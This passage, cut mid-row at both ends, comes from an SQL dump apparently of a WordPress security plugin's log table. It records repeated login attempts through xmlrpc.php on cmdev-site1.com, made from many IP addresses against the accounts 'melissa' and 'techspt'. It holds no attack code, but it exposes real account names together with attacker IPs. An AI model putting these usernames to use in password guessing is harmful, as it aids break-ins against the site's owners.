h8j9w1JPb','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('41.193.5.58',700515642,'melissa',0,1681012891.6505,152,'xe1OivEF6nscqDfNH2G5MjkX','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('62.171.174.52',1051438644,'melissa',0,1681012892.2414,152,'7fEb3r0wTxYFpOlA9Mo5hUJ2','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('68.183.144.184',1152880824,'melissa',0,1681012894.3676,152,'ZiR4tMcO6IvUfHD89akj0GqB','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('86.48.1.153',1445986713,'melissa',0,1681012900.5046,152,'uHv93dpZXo17GmP5hlWqwJtE','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('107.167.244.51',1806169139,'techspt',0,1681012928.0191,152,'aqcYT4Sp8JuF2N06rIbykxPW','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('107.167.244.51',1806169139,'techspt',0,1681012972.8476,152,'ZAiEkqy2OoLz6UFNvS1uITrH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('107.167.244.51',1806169139,'',0,1681012972.8500,10,'ZAiEkqy2OoLz6UFNvS1uITrH','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('213.152.187.230',3583556582,'techspt',0,1681013959.9446,152,'qjbSYy0tZTLJ3N9CmBWgeEnX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.203.161.65',2680922433,'melissa',0,1681013962.7748,152,'3nQfVudXKU4PJBYlM27EF6cT','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.107.196.183',1533789367,'melissa',0,1681013965.7043,152,'geAFNfLvbqotTjSD8Vk17OZ4','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('92.205.3.167',1556939687,'melissa',0,1681013968.5159,152,'X02FWxas1UMozONwtED7Qmcq','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('54.38.242.51',908522035,'melissa',0,1681013976.3289,152,'KIFVdqgumBPXRTHGz8WeUxM4','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.130.219.197',1736629189,'melissa',0,1681013979.9947,152,'jskvQ704LJequwtU2ZalDXiH','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('203.154.39.241',3415877617,'melissa',0,1681013985.8319,152,'NC42aWmFb69GKgD8YvdyQjXi','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('159.203.161.65',2680922433,'melissa',0,1681013989.7273,152,'ud7JHSAXIYawFiDL3VRjUcOn','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('159.203.161.65',2680922433,'',0,1681013989.7310,10,'ud7JHSAXIYawFiDL3VRjUcOn','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('68.178.145.131',1152553347,'melissa',0,1681013993.4753,152,'ZAS7MKqxT4YCtBnQFiLo3jPG','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('154.53.38.46',2587174446,'melissa',0,1681013998.0841,152,'YUriS6XaMlKbdZT5wpyJ0q8B','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.130.219.197',1736629189,'melissa',0,1681013998.2548,152,'hBQ1qjmnvowrYOsAWbEuzaSk','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.130.219.197',1736629189,'',0,1681013998.2582,10,'hBQ1qjmnvowrYOsAWbEuzaSk','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('159.203.161.65',2680922433,'',0,1681014007.8790,71,'eL3Dfy2t80qcpQSNO96o7dhW','','13|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,13,0),('213.152.187.210',3583556562,'techspt',0,1681014697.7198,152,'TZvu9HdO0UxYSRpM2bhI75Xk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('199.249.230.7',3355043335,'techspt',0,1681015814.1956,152,'PSYvyhg0nOXJmwfj5HaW2NZA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.161.101',3583549797,'techspt',0,1681015924.4557,152,'rzD75j9b8FVCnwOEWe62JpdU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('144.24.100.136',2417517704,'melissa',0,1681042377.9815,152,'eRPhOxrYjQV4mK35iMo9kuTg','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('161.97.96.198',2707513542,'melissa',0,1681042378.8115,152,'GCfk9oAh78wrnUjeBLWKVypx','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('213.136.93.169',3582483881,'melissa',0,1681042385.6908,152,'P3oSEwpWOIeNyKsFU68Mr1Am','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.9.220.53',84532277,'melissa',0,1681042390.0913,152,'AF09Uw8oMtuijO5Xn6QRqheL','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('198.23.62.79',3323412047,'melissa',0,1681042393.8414,152,'uCyGbonUQEFskKTO4SIf189A','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.107.196.183',1533789367,'melissa',0,1681042400.2718,152,'R45XUg8IvhwAabxMsjoQHcqL','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('68.183.144.184',1152880824,'melissa',0,1681042401.8401,152,'oXNJ5AVDRGqQPnmShxBjIY3b','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('144.24.100.136',2417517704,'melissa',0,1681042408.1074,152,'9MFibyHOSjd0DvLWs62ErNph','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('144.24.100.136',2417517704,'',0,1681042408.1113,10,'9MFibyHOSjd0DvLWs62ErNph','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('103.130.219.197',1736629189,'melissa',0,1681042421.3119,152,'2mTUgvA9bcIyNLfneMQxW4kD','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('194.187.251.163',3267099555,'techspt',0,1681042550.2443,152,'gQOpvDzAYINf49PELumbaZhB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('72.167.69.17',1218921745,'melissa',0,1681042841.2024,152,'J0M6A4SBT29XbxYWyenzCqvi','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.9.227.178',1728701362,'melissa',0,1681042843.1409,152,'6qCPyandOfbHzipm2ue9LNx1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('142.93.86.83',2388481619,'melissa',0,1681042844.0426,152,'CLMPXoZ12uAvR8OwnU5b0te4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.72.232.52',2487806004,'melissa',0,1681042847.5641,152,'P6puCl4KUO2Wa3yRxhdSGErI','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.95.136.51',576686131,'melissa',0,1681042852.1105,152,'O6VH9zQ7GdUxZ054kRJFvh2N','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('152.67.12.146',2554530962,'melissa',0,1681042862.8862,152,'ajpMhSCUDNfd7T2YwOEQWmg8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('1.20.253.226',18152930,'melissa',0,1681042863.8885,152,'DOrWIHBjF6Xbq8mvU3KxPgkZ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('134.209.234.177',2261904049,'melissa',0,1681042864.3584,152,'s0m8xLg4HiUOPdMIF63Ry5kB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('156.224.21.75',2631931211,'melissa',0,1681042876.2074,152,'wn3pd2ckzi4XlD0ts8YVmFgN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('192.114.164.226',3228738786,'melissa',0,1681042878.7896,152,'skSM5rWCwPmGq4E9lcUdNgLv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('67.198.116.43',1137079339,'',3,1681043541.1573,6,'2L1Wa687YGHk0hv5RZTxJscy','','530|0|0|0|cmdev-site1.com/the-wild-hunt/',0,530,3),('67.198.116.43',1137079339,'Melissa',3,1681043545.1387,5,'HoRz5b4hV62vCnesurXmBNpK','','500|0|0|0|cmdev-site1.com/the-wild-hunt/',0,500,3),('217.138.195.27',3649749787,'techspt',0,1681045895.5961,152,'gm1FGas4LxVtew0RZdXJIkNO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('62.102.148.156',1046910108,'techspt',0,1681047395.2159,152,'Ydia7oFKCjNAJ83m90wIPShX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('192.30.89.59',3223214395,'techspt',0,1681048357.4047,152,'cO76S3iFnCD04kzjl8smZJKy','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('156.38.151.68',2619774788,'melissa',0,1681049210.7841,152,'3x4Jt5HVjkINqiyzECr0fAFl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.115.25',3098047257,'melissa',0,1681049218.9518,152,'y5bDRGmsWK2AjuMzePnrvOFl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('81.208.11.40',1372588840,'melissa',0,1681049219.3638,152,'UVJ2Yax4T9Oh0Wpmi86kSCLn','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('79.170.40.175',1336551599,'melissa',0,1681049228.8738,152,'4CInJ9BgZYuA8GmPNaT1ocXk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.133.215.217',1736824793,'melissa',0,1681049230.2460,152,'2PhAlyMuxYm1B0RacNeHUowz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.210.238.120',148041336,'melissa',0,1681049230.2721,152,'b0CGMPNJyd9FOuX6ATaB21VD','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('156.38.151.68',2619774788,'melissa',0,1681049234.9094,152,'7veXLZzCkaol8jpiHgUdhFM3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('156.38.151.68',2619774788,'',0,1681049234.9126,10,'7veXLZzCkaol8jpiHgUdhFM3','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('37.120.132.91',628655195,'techspt',0,1681049746.6922,152,'AtFBb1WOvdXVszCn2ecl0o8h','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.162.149',3583550101,'techspt',0,1681051292.5550,152,'wReS1POgHWtIMh9VATNkpJ83','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.187.210',3583556562,'techspt',0,1681054427.7010,152,'23ELj5hqxgTVRmD9ObIvu6FM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.187.251.115',3267099507,'techspt',0,1681055435.2451,152,'XYKN0B5zaeHfoA7nP9lGJ1CR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('129.226.138.214',2179107542,'melissa',0,1681056234.7501,152,'xrepUXA2bD9TnJNwEosa5ujl','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('210.65.139.75',3527510859,'melissa',0,1681056236.6250,152,'JiHhoDxFmLcU0sZRBe4ayQl8','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.204.46.91',1540107867,'melissa',0,1681056246.3412,152,'jk4GJ3SYVQ5cR1HEB9XAObfD','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('192.30.89.59',3223214395,'techspt',0,1681056315.7701,152,'wkUpOq6hH28J5vLmToBMZbzC','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.66.147.3',2487390979,'melissa',0,1681056436.7214,152,'IO9tgm8Y7oRKveBWqZzGTuf6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('67.205.178.151',1137554071,'melissa',0,1681056437.0175,152,'FWLOMIBcjQ4PJaSK9HDtu3ez','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.190',1152553406,'melissa',0,1681056447.8399,152,'zEwAZqubJPHoGBOvUyxl2r3s','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('143.110.236.52',2406411316,'melissa',0,1681056449.2858,152,'FLT1hkAstpNMI2zvcKOebwrV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.46.133.245',623805941,'melissa',0,1681056450.7478,152,'2RNQXGgroL3zSqnJd8t6aI4s','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.180.210.110',3484734062,'melissa',0,1681056463.5768,152,'BXeTi3lAdDGZw04Nyb5puzH9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('13.75.144.52',223055924,'melissa',0,1681056469.9483,152,'uLIl1wirBfSVpMvGqKHRAX6F','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.223.71.186',2682210234,'melissa',0,1681056470.4798,152,'SU9qIfO5i783KynYpPxoRCQA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.153.54.112',2979608176,'melissa',0,1681056472.5789,152,'ur6ZT5ehb2yVdjKcJqfSitz3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.66.147.20',2487390996,'melissa',0,1681056472.7986,152,'c6vX8DBFuQJ2IyLt7rVkqPnz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.130.219.197',1736629189,'melissa',0,1681057264.5777,152,'7vb6olsOacP9SujJxt3CDXz0','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.107.196.183',1533789367,'melissa',0,1681057267.6806,152,'3WSLZ0JGgP4UNBXxiVIk5dYs','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('51.178.146.199',867340999,'melissa',0,1681057267.9380,152,'gGe8QJFIMsLE5DtPkf3Uzi2C','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('60.205.95.181',1020092341,'melissa',0,1681057281.3026,152,'O0mQSlFHAoruw9XncMheG1WN','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('68.183.144.184',1152880824,'melissa',0,1681057296.1345,152,'e7OqMxFhbn41YwlfCUQyPAHJ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('89.238.166.235',1508812523,'techspt',0,1681060222.8741,152,'W5RkuBS8DIczLAPpXJTaUCZv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.77.175.167',760065959,'melissa',0,1681060510.9538,152,'iIC6Rtl7HMKJP9QVNsAexywc','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('203.154.39.241',3415877617,'melissa',0,1681060512.3513,152,'wUy93LSbhmHuzrV2dYkKFCX5','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('201.149.91.174',3382008750,'melissa',0,1681060512.9261,152,'fOMIeKbkg2uLoCj4E1pWvnT6','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('54.38.242.51',908522035,'melissa',0,1681060521.1384,152,'ukVqCrU02Npiw6QHODK7M1Za','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.134.248.211',1535572179,'melissa',0,1681060524.5687,152,'qxlMZ3dcm15SzKuRUTIkEAsv','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('192.96.200.110',3227568238,'melissa',0,1681060538.0203,152,'jabYpEo4J9qR7riVmfI8HkCM','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('62.171.174.52',1051438644,'melissa',0,1681060541.4301,152,'dMowpRT9DkB6AI4q2WVzhNlf','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('65.21.239.153',1091956633,'melissa',0,1681060543.6093,152,'WhBMtTmzwkal4DKn8cNv5CXU','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('194.149.144.86',3264581718,'melissa',0,1681060552.7915,152,'LUYaBMySPxur5Fte3kTIfD1E','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('159.223.93.124',2682215804,'melissa',0,1681061325.0545,152,'28gYxW0rXLBAKQGbwmTINjfR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.235.60',3326602044,'melissa',0,1681061325.8001,152,'DUeBMiQXy3ANn4dRZTzfrpL1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('79.170.40.175',1336551599,'melissa',0,1681061329.7397,152,'5hmcNE1fR0WyYbKZlduqiw3x','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('13.75.144.52',223055924,'melissa',0,1681061333.0098,152,'P3gLhuSWAw5261iEOoqJDQ9y','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('113.190.234.69',1908337221,'melissa',0,1681061343.2042,152,'d3zDLH7C2k0rPJOnh8EuUyRM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.46.133.245',623805941,'melissa',0,1681061343.2068,152,'UaZiMjVJfrGyENdHsOw9Acuk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('74.208.57.218',1255160282,'melissa',0,1681061348.1498,152,'0c3XEolhv94u5YSPWjGtDLRK','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.180.210.110',3484734062,'melissa',0,1681061353.7695,152,'5WHqgB7lY0LNnS2Q8e6CPIaM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.92.235.82',1734142802,'melissa',0,1681061353.9543,152,'RqrB0zeUAShE5nIoxglQWON6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.100.170',3098043562,'melissa',0,1681061354.2979,152,'27ZszLRypX5lSu0MBJC3hKQO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('192.30.89.27',3223214363,'techspt',0,1681062539.0129,152,'YkPReaEAd5proLDitG8Vx91H','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.238.150.43',1508808235,'techspt',0,1681063441.4587,152,'Hi0fZqraNFbpd52th3ADvCok','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.169.35.181',1739137973,'melissa',0,1681064323.9123,152,'fS74qu0aDobm8QKgTkGBcvF5','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('109.169.53.7',1839805703,'melissa',0,1681064328.5968,152,'BoFfngyJT4j5WMUExhlu20Vd','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.130.219.197',1736629189,'melissa',0,1681064330.7818,152,'MjroBu0Gm8ka6vIX5K2OcAeP','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('198.54.114.123',3325457019,'melissa',0,1681064331.3687,152,'AiFKz1MsrVC6GHe9fNw48PhY','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('109.169.53.7',1839805703,'melissa',0,1681064338.1569,152,'ERaD6w2YVj8PAzZFhWqMNSrx','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('109.169.53.7',1839805703,'',0,1681064338.1605,10,'ERaD6w2YVj8PAzZFhWqMNSrx','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('109.169.53.7',1839805703,'',0,1681064338.1806,71,'IXHiBKzmeuUQ8G21PlZocaLx','','13|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,13,0),('210.116.66.47',3530834479,'melissa',0,1681064346.6434,152,'IFO6UM3dxTbPv9nZVX7DHfuh','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('203.154.39.241',3415877617,'melissa',0,1681064347.3874,152,'Mo0GcyfbiOaIs6PDxZUL2CVd','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.22.249.133',85391749,'melissa',0,1681064350.9381,152,'NwsoXGtOIqWMnTCu2v9cBpYR','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('134.19.179.171',2249438123,'techspt',0,1681064763.7539,152,'tR6US0MqDKh4IAksuaBFJTxe','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.186.173',3583556269,'techspt',0,1681064819.1866,152,'dFIRASxfEPsBDYG57kpJm1Ha','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('134.19.179.171',2249438123,'techspt',0,1681064826.2835,152,'EI7mUzJhty3ndB6V4liaCDoM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('134.19.179.171',2249438123,'',0,1681064826.2891,10,'EI7mUzJhty3ndB6V4liaCDoM','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('185.182.56.188',3115727036,'melissa',0,1681066934.0652,152,'5woOPpxirAnQe7JVdzS9cjh0','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('81.208.11.40',1372588840,'melissa',0,1681066936.3800,152,'sdH5qtKFWo0NxVP4Tv6lJyGL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.144.123.73',865106761,'melissa',0,1681066937.2539,152,'I852zEhy47kn0xJVKacYOpms','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('113.190.234.69',1908337221,'melissa',0,1681066942.2774,152,'qLkgSE3PQ650FZmtaKB9fsGl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('79.170.40.175',1336551599,'melissa',0,1681066952.5116,152,'MG9RDOojHKm153lFiBhsY6Vp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('113.190.234.69',1908337221,'melissa',0,1681066953.5233,152,'fcbVxyaE03Se52QvRhiFojNw','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('113.190.234.69',1908337221,'',0,1681066953.5264,10,'fcbVxyaE03Se52QvRhiFojNw','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('68.178.145.190',1152553406,'melissa',0,1681066958.0757,152,'VDAmK52g79nFufeNlGM1pEqP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('146.70.76.35',2454080547,'techspt',0,1681067512.2913,152,'8VUOuf2JLgzbst3d7QKCaqjl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('146.70.76.35',2454080547,'techspt',0,1681067929.8028,152,'PAdMqX2vTFoSlQ3GbLcfuwUr','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('146.70.76.35',2454080547,'',0,1681067929.8060,10,'PAdMqX2vTFoSlQ3GbLcfuwUr','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('62.102.148.158',1046910110,'techspt',0,1681068382.1124,152,'O4cMBCNKrVJP1dXWziuaATvb','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.187.200',3583556552,'techspt',0,1681069486.7781,152,'IgLfCDwnSJiZcabNHKYQehlP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('62.102.148.160',1046910112,'techspt',0,1681070934.0218,152,'6COEkalLmMZNneJrcs2ItHjR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.75.223.219',3091980251,'techspt',0,1681071070.1675,152,'Vf2Hk0zsEj4ICydwpuW6QLFR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('200.58.111.20',3359272724,'melissa',0,1681071101.8685,152,'0bKwPvBSWj5gEQxGeOyuT7Af','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.190',1152553406,'melissa',0,1681071111.3773,152,'UlaKVIYrM2DBH4J81nceySTo','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('113.190.234.69',1908337221,'melissa',0,1681071113.5148,152,'dNLiHG3ylpDEvFbZTxfIUzXV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.95.136.51',576686131,'melissa',0,1681071122.2167,152,'mr9eWoygZMs12zUPbjuavqGx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.154.253.117',3483041141,'melissa',0,1681071123.0285,152,'r2AM3EauSgeTlhoWFNtK0vGq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.152.110.52',1754820148,'melissa',0,1681071126.3287,152,'pcVg76abPdxw1kjqLTGofnW9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('77.222.40.118',1306404982,'melissa',0,1681071128.7891,152,'jr6CJNW8q4PtnobayQIZXFYO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('81.208.11.40',1372588840,'melissa',0,1681071132.3242,152,'iKcg7F9XlJqVwMaj8y23tDzN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('192.114.164.226',3228738786,'melissa',0,1681071136.9381,152,'KQNImshfPzAVypF0kd4n52E7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.9.19.107',3104379755,'techspt',0,1681071177.3729,152,'jtqQoMkaYV1d3wlb98KHTrA5','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.233.85.167',3270071719,'melissa',0,1681071369.0190,152,'kqSDwc14Rx6geXF5mUJKo0id','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('92.205.148.93',1556976733,'melissa',0,1681071372.2180,152,'xmPesvzObuthY0DLJXCjnVNK','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('107.190.139.114',1807649650,'melissa',0,1681071374.1074,152,'MNp4OJ7TWVRK2wXbylGeIFiD','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('92.51.149.160',1546884512,'melissa',0,1681071383.1357,152,'ZDdJHn5B4NWVEibAwOe8tg0I','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.22.249.133',85391749,'melissa',0,1681071386.2595,152,'uA42cJHnIoTWD589zmsaXNhp','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('65.21.239.153',1091956633,'melissa',0,1681071387.3961,152,'FUGejkwl4s5W9rBHK3JfOSPI','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.204.46.91',1540107867,'melissa',0,1681071399.2748,152,'cykBhPqNR4mVFbiQJtrzUMfs','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('136.243.5.53',2297627957,'melissa',0,1681071405.2171,152,'PnEcoyHNM4x3zaWu0JrL9T8d','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('116.118.51.5',1953903365,'melissa',0,1681071406.9824,152,'QWSXH8e6Pz0FOLJERyUIGpTD','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('146.70.115.139',2454090635,'techspt',0,1681072727.7471,152,'Uohu61H5OsGMqPpejSDy3li2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.200.117.131',3116922243,'techspt',0,1681072855.2604,152,'TnvhpHjlSNr5gYGQkc2OADmJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.102.23.131',1382422403,'techspt',0,1681073642.0953,152,'q2gRJVb1T4rXfvaWjQBcCpmK','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('64.42.179.51',1076540211,'techspt',0,1681075113.7296,152,'MDPnlZhUzY6vt0kV5L1dsgQW','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.238.150.43',1508808235,'techspt',0,1681075201.4793,152,'mGxaNFUu5sPZpETt7VRA4zwC','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('161.97.96.198',2707513542,'melissa',0,1681075317.3647,152,'1OQwgZYFITui49zRBbWoyPnD','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('203.154.39.241',3415877617,'melissa',0,1681075323.5132,152,'P2HWSNmZK3RQX06xLe57nVtG','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.22.249.133',85391749,'melissa',0,1681075324.9590,152,'fmYpuinMZ2AUWzDrPgBNj6Ht','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('62.171.174.52',1051438644,'melissa',0,1681075335.2927,152,'I8LHT7ijSNdugvn9lhmfZbp